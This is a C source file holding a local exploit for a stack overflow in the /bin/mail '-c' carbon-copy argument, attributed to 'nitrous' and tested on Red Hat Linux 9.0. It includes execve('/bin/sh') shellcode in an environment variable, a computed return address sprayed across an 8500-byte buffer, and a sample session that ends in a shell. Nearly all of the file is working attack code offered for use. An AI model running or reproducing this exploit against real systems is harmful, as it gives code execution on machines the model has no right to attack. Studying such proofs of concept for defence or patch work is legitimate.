/*-==================================================================-
--=[ /bin/mail '-c' carbon copy argument stack overflow
--=[ Local exploit [no suid] by nitrous <nitrous@danitrous.org>
--=[ Tested on Red Hat Linux 9.0
--=[ Technical Information: http://www.securityfocus.com/bid/7760/info/

[nitrous@localhost]$ gcc mail_env_exploit.c -o mail_env_exploit
[nitrous@localhost]$ ./mail_env_exploit
.
Cc: too long to edit
sh-2.05b$ id
uid=500(nitrous) gid=500(nitrous) groups=500(nitrous)
-===================================================================-*/
#include<string.h>

#define	BUFFER_SIZE	8500

char nitrous_egg[]=
"\xeb\x14\x5b\x31\xd2\x88\x53\x07"
"\x89\x5b\x08\x89\x53\x0c\x8d\x4b"
"\x08\x6a\x0b\x58\xcd\x80\xe8\xe7"
"\xff\xff\xff/bin/sh";	//jmp-call execve()

int main()
{
	char *carb0n = (char *)malloc(BUFFER_SIZE);
	char *envir0n[2]={nitrous_egg,NULL};
 
	unsigned long retaddr=0xbffffffa-strlen(nitrous_egg)-strlen("/bin/mail");
 
	int x;
	for(x=0;x<BUFFER_SIZE;x+=4)
		*(unsigned long *)&carb0n[x]=retaddr;

execle("/bin/mail", "mail","-s","eaea","-c",carb0n,"nitrous@danitrous.org",NULL,envir0n);
}